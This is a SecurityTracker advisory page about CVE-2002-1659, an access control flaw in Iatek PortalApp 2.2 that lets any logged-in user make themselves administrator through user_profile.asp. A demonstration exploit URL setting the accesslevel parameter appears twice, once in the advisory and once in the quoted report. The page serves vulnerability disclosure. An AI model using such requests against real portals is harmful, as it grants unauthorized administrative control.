SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   PortalApp Vendors:   Iatek
Iatek PortalApp Access Control Bug Lets Remote Authenticated Users Gain Administrator Privileges on the Portal
SecurityTracker Alert ID:  1005541
SecurityTracker URL:  http://securitytracker.com/id/1005541
CVE Reference:   CVE-2002-1659   (Links to External Site)
Updated:  Jun 3 2008
Original Entry Date:  Nov 5 2002
Impact:   Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 2.2
Description:   SilentScripter reported an access control vulnerability in Iatek's PortalApp. A remote authenticated user can obtain elevated privileges on the portal.

The software permits any authenticated user to set their own privileges on the portal via the 'user_profile.asp' script.

A demonstration exploit URL is provided (where the user_id values are 1 for member, 2 for moderator, 3 for Admin, and 4 for SuperAdmin):

http://localhost/aspportal/user_profile.asp?action=update_view_users&accessl
evel=[level]&user_id=[your_id]&user_name=[your_name]&f_name[your_first_name]
=&l_name=[your_last_name]&dtInserted=[date]&lnk_editprofile=&email=

[Editor's note: The vendor has been notified.]

Impact:   A remote authenticated user can obtain elevated privileges on the portal.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.aspapp.com/apps/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  PortalApp vulnerability



Description : A complete, easy-to-modify .asp portal system. With this
ASPapp portal you can manage users, content, links, forums, surveys,
classifieds, calendar, downloads, images, faq's, news, and more. Complete
asp vbscript source code and Access or SQL database included.
www.aspapp.com/apps/default.asp?section=demos

Exploit :
http://localhost/aspportal/user_profile.asp?action=update_view_users&accessl
evel=[lever]&user_id=[your_id]&user_name=[your_name]&f_name[your_first_name]
=&l_name=[your_last_name]&dtInserted=[date]&lnk_editprofile=&email=




 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC